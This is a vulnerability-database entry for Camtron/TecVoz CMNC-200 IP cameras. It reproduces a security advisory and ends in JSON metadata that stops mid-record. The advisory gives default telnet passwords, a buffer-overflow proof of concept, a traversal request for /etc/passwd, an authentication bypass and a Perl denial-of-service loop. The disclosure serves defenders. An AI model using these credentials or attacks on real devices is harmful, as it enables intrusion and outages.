VAR-201011-0103
Vulnerability from variot - Updated: 2023-12-18 12:10The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. The vulnerable products are listed below: Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions.
Source: http://www.camtron.co.kr Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-4230 CVE-2010-4231 CVE-2010-4232 CVE-2010-4233 CVE-2010-4244
Finding 1: Buffer Overflow in ActiveX Control CVE: CVE-2010-4230
The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation.
The example code below triggers the vulnerability.
IPcam POC function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); }Vendor Response: No response received.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Finding 2: Directory Traversal in Camera Web Server CVE: CVE-2010-4231
The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
The following example will display the contents of /etc/passwd:
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
Because the web server runs as root, an attacker can read critical files like /etc/shadow from the web-based administration interface. Authentication is not required for exploitation.
Vendor Response: No response received.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Finding 3: Web Based Administration Interface Bypass CVE: CVE-2010-4232
The CMNC-200 IP Camera has an administrative web interface that does not handle authentication properly. Using a properly formatted request, an attacker can bypass the authentication mechanism.
The first example requires authentication: http://www.ipcamera.com/system.html
When a second forward slash is placed after the hostname, authentication is not required.
Vendor Response: No response received.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233
The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Finding 5: Camera Denial of Service CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot.
Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size.
The example code below is able to reboot the IP cameras in less than a minute in a local network.
!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,/;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req);
}
Vendor Response: No response received.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release
Revision History: 1.0 Initial publication
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0103",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cmnc-200",
"scope": "eq",
"trust": 2.4,
"vendor": "tecvoz",
"version": "1.102a-008"
},
{
"model": "cmnc-200",
"scope": "eq",
"trust": 1.8,
"vendor": "camtron",
"version": "1.102a-008"
},
{
"model": "cmnc-200",
"scope": "eq",
"trust": 1.0,
"vendor": "tecvoz",
"version": "*"
},
{
"model": "cmnc-200",
"scope": "eq",
"trust": 1.0,
"vendor": "camtron",
"version": "*"
},
{
"model": "cmnc-200",
"scope": null,
"trust": 0.8,
"vendor": "camtron",
"version": null
},
{
"model": "cmnc-200",
"scope": null,
"trust": 0.8,
"vendor": "tecvoz",
"version": null
},
{
"model": "cmnc-200 v1.102a-008 board id",
"scope": "eq",
"trust": 0.6,
"vendor": "camtron",
"version": "/66"
},
{
"model": "activex control",
"scope": "eq",
"trust": 0.3,
"vendor": "tvslivecontrol",
"version": "1.6.50.33"
},
{
"model": "cmnc-200 full hd ip camera 1.102a-008",
"scope": null,
"trust": 0.3,
"vendor": "camtron",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "BID",
"id": "44841"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:camtron:cmnc-200:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:tecvoz:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:tecvoz:cmnc-200:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4233"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Wendel G. Henrique of Trustwave\u0027s SpiderLabs",
"sources": [
{
"db": "BID",
"id": "44841"
}
],
"trust": 0.3
},
"cve": "CVE-2010-4233",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-4233",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-46838",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-4233",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201011-199",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-46838",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. \nExploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. \nThe vulnerable products are listed below:\nCamtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable. \nTVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The most notable features are full HD support\n(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input\nand output alarm sensor, and integration with different DVR solutions. \n\nSource: http://www.camtron.co.kr\nCredit: Wendel G. Henrique of Trustwave\u0027s SpiderLabs\n\nCVE: CVE-2010-4230\n CVE-2010-4231\n CVE-2010-4232\n CVE-2010-4233\n CVE-2010-4244\n\nFinding 1: Buffer Overflow in ActiveX Control\nCVE: CVE-2010-4230\n\nThe CMNC-200 IP Camera ActiveX control identified by\nCLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable\nto a stack overflow on the first argument of the connect method. \nThe vulnerability can be used to set the EIP register,\nallowing a reliable exploitation. \n\nThe example code below triggers the vulnerability. \n\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eIPcam POC\u003c/title\u003e\n\u003cscript\u003e\nfunction Check(){\n var bf1 = \u0027A\u0027;\n while (bf1.length \u003c= 6144) bf1 = bf1 + \u0027A\u0027;\n obj.connect(bf1,\"BBBB\",\"CCCC\");\n}\n\u003c/script\u003e\n\u003c/head\u003e\n\u003cbody onload=\" Check();\"\u003e\n\u003cobject classid=\"clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32\"\nid=\"obj\"\u003e\n\u003c/object\u003e\n\u003c/html\u003e\u003c/body\u003e\n\nVendor Response:\nNo response received. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\n\nFinding 2: Directory Traversal in Camera Web Server\nCVE: CVE-2010-4231\n\nThe CMNC-200 IP Camera has a built-in web server that\nis enabled by default. The server is vulnerable to directory\ntransversal attacks, allowing access to any file on the\ncamera file system. \n\nThe following example will display the contents of\n/etc/passwd:\n\nGET /../../../../../../../../../../../../../etc/passwd\nHTTP/1.1\n\nBecause the web server runs as root, an attacker can read\ncritical files like /etc/shadow from the web-based\nadministration interface. Authentication is not required for\nexploitation. \n\nVendor Response:\nNo response received. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\n\nFinding 3: Web Based Administration Interface Bypass\nCVE: CVE-2010-4232\n\nThe CMNC-200 IP Camera has an administrative web\ninterface that does not handle authentication properly. \nUsing a properly formatted request, an attacker can bypass\nthe authentication mechanism. \n\nThe first example requires authentication:\nhttp://www.ipcamera.com/system.html\n\nWhen a second forward slash is placed after the hostname,\nauthentication is not required. \n\nVendor Response:\nNo response received. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\n\nFinding 4: Undocumented Default Accounts\nCVE: CVE-2010-4233\n\nThe CMNC-200 IP Camera has undocumented default\naccounts on its Linux operating system. These accounts can\nbe used to login via the cameras telnet interface, which\ncannot be normally disabled. The usernames and passwords are\nlisted below. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\n\nFinding 5: Camera Denial of Service\nCVE: CVE-2010-4234\n\nThe CMNC-200 IP Camera has a built-in web server that\nis vulnerable to denial of service attacks. Sending multiple\nrequests in parallel to the web server may cause the camera\nto reboot. \n\nRequests with long cookie header makes the IP camera reboot a few\nseconds faster, however the same can be accomplished with requests\nof any size. \n\nThe example code below is able to reboot the IP cameras in\nless than a minute in a local network. \n\n#!/usr/bin/perl\n\nuse LWP::UserAgent;\n\nwhile (1 == 1){\n\n$ua = new LWP::UserAgent;\n$ua-\u003eagent(\"Mozilla/5.0 (X11; U; Linux i686; en-US;\nrv:1.8.1.6)\");\n\n$req = HTTP::Request-\u003enew(GET =\u003e \u0027http://192.168.10.100\u0027);\n$req-\u003eheader(Accept =\u003e\n\"text/xml,application/xml,application/xhtml+xml,text/html\n;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\");\n$req-\u003eheader(\"Keep-Alive\" =\u003e 0);\n$req-\u003eheader(Connection =\u003e \"close\");\n$req-\u003eheader(\"If-Modified-Since\" =\u003e \"Mon, 12 Oct 2009\n02:06:34 GMT\");\n$req-\u003eheader(Cookie =\u003e\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");\nmy $res = $ua-\u003erequest($req);\n\n}\n\nVendor Response:\nNo response received. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\nVendor Communication Timeline:\n10/7/10 - Vendor contact attempted\n10/21/10 - Vendor contact attempted\n11/1/10 - Vendor contact attempted\n11/11/10 - CVE numbers obtained\n11/12/10 - Advisory public release\n\nRevision History:\n1.0 Initial publication\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs is the advance security team at Trustwave responsible for\nincident response and forensics, ethical hacking and application security\ntests for Trustwave\u0027s clients. SpiderLabs has responded to hundreds of\nsecurity incidents, performed thousands of ethical hacking exercises and\ntested the security of hundreds of business applications for Fortune 500\norganizations. For more information visit\nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "BID",
"id": "44841"
},
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "PACKETSTORM",
"id": "95794"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-46838",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-46838"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-4233",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "15507",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2010-2887",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20101112 TWSL2010-006: MULTIPLE VULNERABILITIES IN CAMTRON CMNC-200 IP CAMERA",
"trust": 0.6
},
{
"db": "BID",
"id": "44841",
"trust": 0.3
},
{
"db": "SEEBUG",
"id": "SSVID-70206",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-46838",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "95794",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "BID",
"id": "44841"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "PACKETSTORM",
"id": "95794"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"id": "VAR-201011-0103",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "VULHUB",
"id": "VHN-46838"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
}
]
},
"last_update_date": "2023-12-18T12:10:59.986000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.camtron.co.kr/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.tecvoz.com.br/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2010-006.txt"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/15507"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/514753/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4233"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4233"
},
{
"trust": 0.6,
"url": "http://www.exploit-db.com/exploits/15507/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/514753/100/0/threaded"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2010/nov/127"
},
{
"trust": 0.3,
"url": "http://www.camtron.co.kr/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4232"
},
{
"trust": 0.1,
"url": "http://192.168.10.100\u0027);"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4244"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4231"
},
{
"trust": 0.1,
"url": "http://www.camtron.co.kr"
},
{
"trust": 0.1,
"url": "http://www.ipcamera.com/system.html"
},
{
"trust": 0.1,
"url": "http://www.tecvoz.com.br/)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4230"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-4233"
},
{
"trust": 0.1,
"url": "http://www.ipcamera.com//system.html"
},
{
"trust": 0.1,
"url": "http://www.camtron.co.kr/)"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "BID",
"id": "44841"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "PACKETSTORM",
"id": "95794"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2010-2887"
},
{
"db": "VULHUB",
"id": "VHN-46838"
},
{
"db": "BID",
"id": "44841"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003392"
},
{
"db": "PACKETSTORM",
"id": "95794"
},
{
"db": "NVD",
"id": "CVE-2010-4233"
},
{
"db": "CNNVD",
"id": "CNNVD-201011-199"
}
]
},
"sources_release_date": {
"@context": {
